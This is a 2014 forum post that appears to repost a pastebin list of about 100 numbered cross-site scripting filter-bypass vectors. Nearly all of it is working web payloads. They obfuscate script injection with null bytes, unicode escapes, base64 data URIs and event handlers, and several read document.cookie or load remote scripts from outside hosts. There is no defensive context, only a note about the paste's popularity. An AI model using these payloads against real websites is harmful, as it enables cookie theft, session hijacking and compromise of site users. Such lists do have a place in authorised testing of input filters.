Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Oh hi
Options
-
27-03-2014 4:28pm#11) <iframe %00 src="	javascript:prompt(1)	"%00>
2) <svg><style>{font-family:'<iframe/onload=confirm(1)>'
3) <input/onmouseover="javaSCRIPT:confirm(1)"
4) <sVg><scRipt %00>alert(1) {Opera}
5) <img/src=`%00` onerror=this.onerror=confirm(1)
6) <form><isindex formaction="javascript:confirm(1)"
7) <img src=`%00`
 onerror=alert(1)

8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
12) "><h1/onmouseover='\u0061lert(1)'>%00
13) <iframe/src="data:text/html,<svg onload=alert(1)>">
14) <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
18) <iframe src=javascript:alert(document.location)>
19) <form><a href="javascript:\u0061lert(1)">X
20) </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
21) <img/
src=`~` onerror=prompt(1)>
22) <form><iframe
src="javascript:alert(1)"
;>
23) <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
>X</a
24) http://www.google<script .com>alert(document.location)</script
25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
onerror = prompt('1')
27) <style/onload=prompt('XSS')
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
29) </style ><script
>/**/alert(document.location)/**/</script
30) �</form><input type="date" onfocus="alert(1)">
31) <form><textarea
onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
33) <iframe srcdoc='<body onload=prompt(1)>'>
34) <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
35) <script ~~~>alert(0%0)</script ~~~>
36) <style/onload=<!-- >
alert
(1)>
37) <///style///><span %2F onmousemove='alert(1)'>SPAN
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
40)
<blink/
onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
41) <marquee onstart='javascript:alert(1)'>^__^
42) <div/style="width:expression(confirm(1))">X</div> {IE7}
43) <iframe/%00/ src=javaSCRIPT:alert(1)
44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
45) /*iframe/src*/<iframe/src="<iframe/src=@/onload=prompt(1) /*iframe/src*/>
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
48) <a/href="javascript:
javascript:prompt(1)"><input type="X">
49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
I have already tweeted about the following 50 XSS vectors and so far the paste has more than 1600 hits (http://pastebin.com/mQDbu7Sm)
__________________________________________________________________________________________________________________________________________________________________________________________________________________
51) <a href="javascript:\u0061le%72t(1)"><button>
52) <div onmouseover='alert(1)'>DIV</div>
53) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
54) <a href="jAvAsCrIpT:alert(1)">X</a>
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
57) <var onmouseover="prompt(1)">On Mouse Over</var>
58) <a href=javascript:alert(document.cookie)>Click Here</a>
59) <img src="/" =_=" title="onerror='prompt(1)'">
60) <%<!--'%><script>alert(1);</script -->
61) <script src="data:text/javascript,alert(1)"></script>
62) <iframe/src \/\/onload = prompt(1)
63) <iframe/onreadystatechange=alert(1)
64) <svg/onload=alert(1)
65) <input value=<><iframe/src=javascript:confirm(1)
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
67) http://www.<script>alert(1)</script .com
68) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
69) <svg><script ?>alert(1)
70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
71) <img src=`xx:xx`onerror=alert(1)>
72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
74) <math><a xlink:href="//http://jsfiddle.net/t846h/">click
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
76) <svg contentScriptType=text/vbs><script>MsgBox+1
77) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
80) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
81) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
82) <object data=javascript:\u0061le%72t(1)>
83) <script>+-+-1-+-+alert(1)</script>
84) <body/onload=<!-->
alert(1)>
85) <script itworksinallbrowsers>/*<script* */alert(1)</script
86) <img src ?itworksonchrome?\/onerror = alert(1)
87) <svg><script>//
confirm(1);</script </svg>
88) <svg><script onlypossibleinopera:)> alert(1)
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
90) <script x> alert(1) </script 1=2
91) <div/onmouseover='alert(1)'> style="x:">
92) <--`<img/src=` onerror=alert(1)> --!>
93) <script/src=data:text/javascript,alert(1)></script>
94) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
95) "><img src=x onerror=window.open('https://www.google.com/');>
96) <form><button formaction=javascript:alert(1)>CLICKME
97) <math><a xlink:href="//http://jsfiddle.net/t846h/">click
98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
100) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>">Click Me</a>0
Leave a Comment
Advertisement